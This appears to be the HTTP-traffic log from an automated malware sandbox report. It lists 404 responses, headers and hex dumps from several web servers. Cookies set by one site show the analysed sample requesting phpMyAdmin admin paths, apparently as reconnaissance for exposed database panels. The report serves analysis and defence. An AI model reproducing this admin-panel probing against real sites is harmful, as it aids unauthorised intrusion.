Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 22 Dec 2023 20:15:06 GMTContent-Length: 4946Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 22 Dec 2023 20:15:06 GMTContent-Length: 4948Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.4.33set-cookie: apbct_timestamp=1703276107; path=/; HttpOnly; SameSite=Laxset-cookie: apbct_site_landing_ts=1703276107; path=/; HttpOnly; SameSite=Laxset-cookie: apbct_page_hits=1; path=/; HttpOnly; SameSite=Laxset-cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%25229777a9f696ace65fe22801eb48b77f12%2522%257D; path=/; HttpOnly; SameSite=Laxset-cookie: apbct_urls=%7B%22fuckyoufriday.com.au%2FPhpMyAdmin%2F%22%3A%5B1703276107%5D%7D; expires=Mon, 25-Dec-2023 20:15:07 GMT; Max-Age=259200; path=/; domain=fuckyoufriday.com.au; HttpOnly; SameSite=Laxset-cookie: apbct_site_referer=UNKNOWN; expires=Mon, 25-Dec-2023 20:15:07 GMT; Max-Age=259200; path=/; domain=fuckyoufriday.com.au; HttpOnly; SameSite=Laxset-cookie: ct_sfw_pass_key=e069c2df4180b2c12608affc9bf7d5e00; expires=Sun, 21-Jan-2024 20:15:07 GMT; Max-Age=2592000; path=/; SameSite=Laxexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://fuckyoufriday.com.au/wp-json/>; rel=Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:06 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://adm-works.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a Data Ascii: 16<!DOCTYPE html><html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zm8iPNj6nUdwCdhmdn%2BOe4ayS6dV7s8TJ3WTZwDYqyfe0JsjPrQCX5rkBN3ICrAU6qgV7tNNfOyvVilXIWDl8NrWBqylH%2FsITCk2FCpbrUlB0Je%2FDcjNgWKxt7lSkVUY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b08fbab72746e-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a Data Ascii: 7d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Dec 2023 20:15:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingLast-Modified: Mon, 16 Oct 2023 04:34:27 GMTETag: W/"400-607cdebea636c"Content-Encoding: gzipData Raw: 32 35 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 65 53 dd 6b db 30 10 7f f7 5f 71 f3 4b 5f f2 b1 8e 6e 0f c3 0b b4 24 a3 81 76 1d 4d c6 28 a5 0c 45 3e c5 22 b2 e4 49 a7 ba fe ef 7b b2 92 32 ba 17 1b db fa 7d de b9 ba de de de 2c 8a ea 7a 75 b9 e4 db 76 bd bd 59 2d 2e 3e 5e c0 0f 47 f0 dd 45 5b 57 f3 fc b2 a8 ae 2e 37 2b 68 3c aa 6f e5 1c bd 77 fe 4f ed 64 98 97 8b ea c3 74 fa a8 15 18 42 58 af e0 cb d3 a2 9a a7 c3 fc e1 11 6d ad d5 d3 74 ca e4 f3 a3 c8 d5 dd f2 21 49 9e 2f fe 11 e1 a7 62 db 20 78 fc 1b 31 10 d6 c0 e4 b1 45 4b d0 8b 00 96 ed a8 64 07 9c 05 6a 74 80 80 fe 19 fd ac a8 7e 26 ae 7b be 5c 2e 97 f7 ab cd 66 51 fc c6 1d 6c c6 cf 20 08 3a a9 98 29 cc a4 6b 67 cd 81 6d bc 9d 63 97 d9 ca 3c b7 50 a4 20 05 00 4c e1 97 55 ce 53 b4 82 d0 0c 13 b8 d5 d2 bb e0 14 41 c3 66 44 5d b3 3f 01 d2 20 5b 00 8b 7d 06 95 0a 05 45 8f 25 90 83 b5 25 f4 16 09 56 2f 9d 71 9e ad c2 5a b1 75 04 c2 17 02 a7 32 46 58 18 bb 3c 0b d0 62 08 62 8f c0 e1 4a 72 0e 42 2b 8c 29 27 10 3a 94 5a 69 c9 4f 43 06 19 3e c9 54 8c fd 7c fe 09 76 03 61 98 fc 2f c8 5d b2 1b 1b 32 46 53 00 d7 1f d5 4e 5a 33 78 70 11 24 13 a5 93 89 32 39 53 93 0c d9 45 02 4d ec ac 63 26 1a 80 bc 96 07 be 39 50 9a 27 11 7a 4d b2 61 b4 31 58 67 44 c9 9e 3d e5 44 27 8d 50 ce 60 9b 88 5b 14 96 7d 3a 05 d2 45 1f f0 a8 32 8a 86 86 eb 7e 87 03 e1 11 24 da c0 ed d5 9c 12 6a 54 22 1a 9a 65 ad f5 7a 03 c2 f4 62 08 a7 a0 ef f1 23 73 22 31 ce ee 33 08 ad 8b fb 26 45 68 c5 81 b7 f5 fd 90 78 be 5d 37 24 c3 98 01 bd f3 07 e1 c7 cd e3 b9 1c 8b 08 ba ed 0c 7e 85 4e d4 e3 44 c7 09 e6 f3 a7 21 72 37 0d af c8 4e ef 39 6d 3b ee b1 d1 ac 38 ee 2e cb 77 31 34 5c 6e 06 b9 b4 46 69 35 94 7e 46 68 78 cd 53 62 c1 1d 53 8f 86 5f 8d 23 86 56 5b dd c6 f6 98 ff ee ad c7 71 6e 3c 26 7c 11 92 cc 00 7d 6a 7b 70 f1 8c a3 7b 14 b5 3e a5 f7 7a df 10 ff 4b 7d a6 e0 9f f2 15 cf fd b9 60 00 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 25eeSk0_qK_n$vM(E>"I{2},zuvY-.>^GE[W.7+h<owOdtBXmt!I/b x1EKdjt~&{\.fQl :)kgmc<P LUSAfD]? [}E%%V/qZu2FX<bbJrB+)':ZiOC>T\|va/]2FSNZ3xp$29SEMc&9P'zMa1XgD=D'P`[}:E2~$jT"ezb#s"13&Ehx]7$~ND!r7N9m;8.w14\nFi5~FhxSbS_#V[qn<&\|}j{p{>zK}`0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:08 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://adm-works.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a Data Ascii: 16<!DOCTYPE html><html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Dec 2023 20:15:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingLast-Modified: Mon, 16 Oct 2023 04:34:27 GMTETag: W/"400-607cdebea636c"Content-Encoding: gzipData Raw: 32 35 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 65 53 dd 6b db 30 10 7f f7 5f 71 f3 4b 5f f2 b1 8e 6e 0f c3 0b b4 24 a3 81 76 1d 4d c6 28 a5 0c 45 3e c5 22 b2 e4 49 a7 ba fe ef 7b b2 92 32 ba 17 1b db fa 7d de b9 ba de de de 2c 8a ea 7a 75 b9 e4 db 76 bd bd 59 2d 2e 3e 5e c0 0f 47 f0 dd 45 5b 57 f3 fc b2 a8 ae 2e 37 2b 68 3c aa 6f e5 1c bd 77 fe 4f ed 64 98 97 8b ea c3 74 fa a8 15 18 42 58 af e0 cb d3 a2 9a a7 c3 fc e1 11 6d ad d5 d3 74 ca e4 f3 a3 c8 d5 dd f2 21 49 9e 2f fe 11 e1 a7 62 db 20 78 fc 1b 31 10 d6 c0 e4 b1 45 4b d0 8b 00 96 ed a8 64 07 9c 05 6a 74 80 80 fe 19 fd ac a8 7e 26 ae 7b be 5c 2e 97 f7 ab cd 66 51 fc c6 1d 6c c6 cf 20 08 3a a9 98 29 cc a4 6b 67 cd 81 6d bc 9d 63 97 d9 ca 3c b7 50 a4 20 05 00 4c e1 97 55 ce 53 b4 82 d0 0c 13 b8 d5 d2 bb e0 14 41 c3 66 44 5d b3 3f 01 d2 20 5b 00 8b 7d 06 95 0a 05 45 8f 25 90 83 b5 25 f4 16 09 56 2f 9d 71 9e ad c2 5a b1 75 04 c2 17 02 a7 32 46 58 18 bb 3c 0b d0 62 08 62 8f c0 e1 4a 72 0e 42 2b 8c 29 27 10 3a 94 5a 69 c9 4f 43 06 19 3e c9 54 8c fd 7c fe 09 76 03 61 98 fc 2f c8 5d b2 1b 1b 32 46 53 00 d7 1f d5 4e 5a 33 78 70 11 24 13 a5 93 89 32 39 53 93 0c d9 45 02 4d ec ac 63 26 1a 80 bc 96 07 be 39 50 9a 27 11 7a 4d b2 61 b4 31 58 67 44 c9 9e 3d e5 44 27 8d 50 ce 60 9b 88 5b 14 96 7d 3a 05 d2 45 1f f0 a8 32 8a 86 86 eb 7e 87 03 e1 11 24 da c0 ed d5 9c 12 6a 54 22 1a 9a 65 ad f5 7a 03 c2 f4 62 08 a7 a0 ef f1 23 73 22 31 ce ee 33 08 ad 8b fb 26 45 68 c5 81 b7 f5 fd 90 78 be 5d 37 24 c3 98 01 bd f3 07 e1 c7 cd e3 b9 1c 8b 08 ba ed 0c 7e 85 4e d4 e3 44 c7 09 e6 f3 a7 21 72 37 0d af c8 4e ef 39 6d 3b ee b1 d1 ac 38 ee 2e cb 77 31 34 5c 6e 06 b9 b4 46 69 35 94 7e 46 68 78 cd 53 62 c1 1d 53 8f 86 5f 8d 23 86 56 5b dd c6 f6 98 ff ee ad c7 71 6e 3c 26 7c 11 92 cc 00 7d 6a 7b 70 f1 8c a3 7b 14 b5 3e a5 f7 7a df 10 ff 4b 7d a6 e0 9f f2 15 cf fd b9 60 00 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 25eeSk0_qK_n$vM(E>"I{2},zuvY-.>^GE[W.7+h<owOdtBXmt!I/b x1EKdjt~&{\.fQl :)kgmc<P LUSAfD]? [}E%%V/qZu2FX<bbJrB+)':ZiOC>T\|va/]2FSNZ3xp$29SEMc&9P'zMa1XgD=D'P`[}:E2~$jT"ezb#s"13&Ehx]7$~ND!r7N9m;8.w14\nFi5~FhxSbS_#V[qn<&\|}j{p{>zK}`0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.4.33set-cookie: apbct_timestamp=1703276109; path=/; HttpOnly; SameSite=Laxset-cookie: apbct_site_landing_ts=1703276109; path=/; HttpOnly; SameSite=Laxset-cookie: apbct_page_hits=1; path=/; HttpOnly; SameSite=Laxset-cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%252210211c4524e06bc0871a13d22b5d09f8%2522%257D; path=/; HttpOnly; SameSite=Laxset-cookie: apbct_urls=%7B%22fuckyoufriday.com.au%2Fpma%2F%22%3A%5B1703276109%5D%7D; expires=Mon, 25-Dec-2023 20:15:09 GMT; Max-Age=259200; path=/; domain=fuckyoufriday.com.au; HttpOnly; SameSite=Laxset-cookie: apbct_site_referer=UNKNOWN; expires=Mon, 25-Dec-2023 20:15:09 GMT; Max-Age=259200; path=/; domain=fuckyoufriday.com.au; HttpOnly; SameSite=Laxset-cookie: ct_sfw_pass_key=e069c2df4180b2c12608affc9bf7d5e00; expires=Sun, 21-Jan-2024 20:15:09 GMT; Max-Age=2592000; path=/; SameSite=Laxexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://fuckyoufriday.com.au/wp-json/>; rel="https:Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 22 Dec 2023 20:15:09 GMTContent-Length: 4950Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:15:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Bk3Hd6AjU1gnUE4ao1M5RN37gQ5Z9IjuP9IMz2WVj7lV5B6XaFzIAQO1oxrvQE5W3%2BPyAKxS57s252rUjRyc7d3S9jXKz2VhvRjMAkVV0XZ7xA3X6Y0RAVxpP3UmR7Ty"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b090a2b198e03-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a Data Ascii: 7d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Dec 2023 20:15:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingLast-Modified: Mon, 16 Oct 2023 04:34:27 GMTETag: W/"400-607cdebea636c"Content-Encoding: gzipData Raw: 32 35 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 65 53 dd 6b db 30 10 7f f7 5f 71 f3 4b 5f f2 b1 8e 6e 0f c3 0b b4 24 a3 81 76 1d 4d c6 28 a5 0c 45 3e c5 22 b2 e4 49 a7 ba fe ef 7b b2 92 32 ba 17 1b db fa 7d de b9 ba de de de 2c 8a ea 7a 75 b9 e4 db 76 bd bd 59 2d 2e 3e 5e c0 0f 47 f0 dd 45 5b 57 f3 fc b2 a8 ae 2e 37 2b 68 3c aa 6f e5 1c bd 77 fe 4f ed 64 98 97 8b ea c3 74 fa a8 15 18 42 58 af e0 cb d3 a2 9a a7 c3 